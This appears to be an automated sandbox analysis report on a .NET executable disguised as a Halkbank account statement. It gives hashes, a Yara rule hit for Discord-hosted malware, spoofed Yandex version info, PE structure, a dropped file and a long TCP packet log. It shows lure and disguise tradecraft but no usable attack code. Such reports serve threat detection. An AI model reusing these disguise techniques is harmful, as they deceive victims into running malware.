SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\verify.exe

Download File

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	5.491133599595456
Encrypted:	false
SSDEEP:	384:JtbZLfofbrTmLqLRLvm+P7V5KGQxy3d7OU3YfIDtPP:Jt5AfbjF++hv3QYYfE
MD5:	749AAF49615AA07EDC9755541B213A4A
SHA1:	8E856CAE4E8D14C7D37F5D8342FC2D30ACFEDE64
SHA-256:	D47BD2FF5D90D64D18485203E59A952E485A39F98E3D54258A578B13D9136AE7
SHA-512:	A3B731A35B418AB43EFC8D09E2373BB659DC78FA8408FA6EDC6DA66D13E03F13228B6DB22EAB4A47BE96A99C162C09D01565182E3684E61A0FA017E9C7B4F7B7
Malicious:	true
Yara Hits:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\verify.exe, Author: Florian Roth
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... ...............0......,......z5... ...@....@.. ....................................@.................................(5..O....@..<)...........................5............................................... ............... ..H............text........ ...................... ..`.rsrc...<)...@.....................@..@.reloc...............B..............@..B................\5......H........#..H...........T4..............................................:.(.....(.......0...........(...... ....(........&...............~.....i ...........,Z......(....r...prC..prM..p(..........%..!...(.....(....s..........%.rO..p.o....t..........(.......................s....%r...po.....%r...po.....%.o.....%.o.....(....o ......s....%(!...~....(...+(...+o$...o%...}..........0............(!...o&......8..........o%...~....{....('.....,z...o(........+`..........o)...r...p(.

C:\Users\user\AppData\Local\verify.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Halkbank_Ekstre_20220128_081138_756957 (1).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20220128\PowerShell_transcript.210979.n+7rO7_o.20220128221324.txt

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1030
Entropy (8bit):	5.220546136298674
Encrypted:	false
SSDEEP:	24:BxSACG7vBZD0x2DOXUWThCkmJRqtPCWbHjeTKKjX4CIym1ZJXavAnxSAZGx:BZCsvjD0oOzhnmJgtPVbqDYB1Zgv+ZZm
MD5:	1305A1F95E59F02A4C0EB838EE1EEABA
SHA1:	E60EDFDED060D499D762B765BD86E92ACA7D2F68
SHA-256:	6DFA4843285CE411784534A1A2582A28B0BE47CE783B4407D5C4592CA56C8F72
SHA-512:	98E186F9E6CC0A9D5918738E742107153223904F24368F6E8A492B48E6D4EB6D8C53BBB755AF119F2889C9A1E1E7B331C5EE5B43DDBF1C84A7242188EF85BE61
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220128221401..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 210979 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==..Process ID: 4744..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220128221401..******************..PS>[Threading.Thread]::Sleep(20000)..******************..Command start time: 20220128221437..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End time: 2022012822

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.491133599595456
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Halkbank_Ekstre_20220128_081138_756957 (1).exe
File size:	17408
MD5:	749aaf49615aa07edc9755541b213a4a
SHA1:	8e856cae4e8d14c7d37f5d8342fc2d30acfede64
SHA256:	d47bd2ff5d90d64d18485203e59a952e485a39f98e3d54258a578b13d9136ae7
SHA512:	a3b731a35b418ab43efc8d09e2373bb659dc78fa8408fa6edc6da66d13e03f13228b6db22eab4a47be96a99c162c09d01565182e3684e61a0fa017e9c7b4f7b7
SSDEEP:	384:JtbZLfofbrTmLqLRLvm+P7V5KGQxy3d7OU3YfIDtPP:Jt5AfbjF++hv3QYYfE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... ...............0......,......z5... ...@....@.. ....................................@................................

File Icon


Icon Hash:	d0d8ac94aab68cac

Static PE Info

General

Entrypoint:	0x40357a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xE0201BDD [Fri Feb 25 20:11:09 2089 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3528	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x293c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x350c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1580	0x1600	False	0.552556818182	data	5.41376989339	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x293c	0x2a00	False	0.447265625	data	5.33465826805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4140	0x1200	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 391205461, next used block 36647478
RT_ICON	0x5350	0xa00	data
RT_ICON	0x5d60	0x600	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x6370	0x30	data
RT_VERSION	0x63b0	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST	0x674c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright (c) 2012-2022 YANDEX LLC. All Rights Reserved.
Assembly Version	22.1.0.2517
InternalName	Cszji.exe
FileVersion	22.1.0.2517
CompanyName	YANDEX LLC
LegalTrademarks
Comments	Yandex
ProductName	Yandex
ProductVersion	22.1.0.2517
FileDescription	Yandex
OriginalFilename	Cszji.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 22:14:30.813638926 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:30.813698053 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:30.813781977 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.206742048 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.206774950 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.251158953 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.251312971 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.256405115 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.256417990 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.256688118 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.422004938 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.560879946 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.605885983 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617537975 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617604971 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617641926 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617671013 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617676020 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.617696047 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617710114 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.617753983 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617789030 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617799044 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.617808104 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617844105 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617855072 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.617878914 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617921114 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.617929935 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617959976 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.617989063 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618004084 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618014097 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618046045 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618058920 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618067980 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618099928 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618109941 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618119001 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618145943 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618168116 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618176937 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618207932 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618220091 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618228912 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618262053 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618283033 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618288994 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618319035 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618339062 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618345976 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618374109 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618387938 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618396044 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618427038 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618443966 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618449926 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618480921 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618491888 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618498087 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618529081 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618546009 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618551970 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618581057 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618596077 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618602991 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618653059 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618659019 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618685007 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618715048 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618726969 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618732929 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618771076 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618772030 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618779898 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618808985 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618834019 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.618840933 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.618865967 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.635678053 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635777950 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635782003 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.635801077 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635823011 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635828972 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.635874033 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.635875940 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635888100 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635921955 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635922909 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.635960102 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635967970 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.635977030 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.635997057 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.636002064 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.636025906 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.636032104 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.636043072 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.636045933 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.636068106 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.636070967 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.636080027 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.636104107 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.636137009 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.652801037 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.652873039 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.652910948 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.652915955 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.652934074 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.652952909 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.652956963 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.652995110 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653001070 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653009892 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653033018 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653033972 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653067112 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653070927 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653074026 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653080940 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653115988 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653117895 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653157949 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653162003 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653171062 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653203964 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653217077 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653261900 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653270960 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653281927 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653312922 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653321028 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653336048 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653348923 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653386116 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653393984 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653404951 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653431892 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653439999 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653466940 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653486967 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653533936 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653539896 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653549910 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653595924 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653599977 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653609037 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653644085 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653652906 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653666019 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653672934 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653698921 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653723955 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653762102 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653772116 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653781891 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653785944 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653814077 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653821945 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653835058 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653845072 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653873920 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653881073 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653908968 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653924942 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653934002 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.653954029 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.653959990 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654006004 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654014111 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654028893 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654055119 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654062986 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654074907 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654084921 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654119015 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654125929 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654153109 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654165983 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654172897 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654207945 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654216051 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654258966 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654262066 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654272079 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654311895 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654330969 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654381037 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654388905 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654403925 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654428005 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654436111 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654447079 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654455900 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654480934 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654490948 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654499054 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654526949 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654731989 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654771090 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654791117 CET	443	49761	162.159.130.233	192.168.2.4
Jan 28, 2022 22:14:32.654846907 CET	49761	443	192.168.2.4	162.159.130.233
Jan 28, 2022 22:14:32.654856920 CET	443	49761	162.159.130.233	192.168.2.4
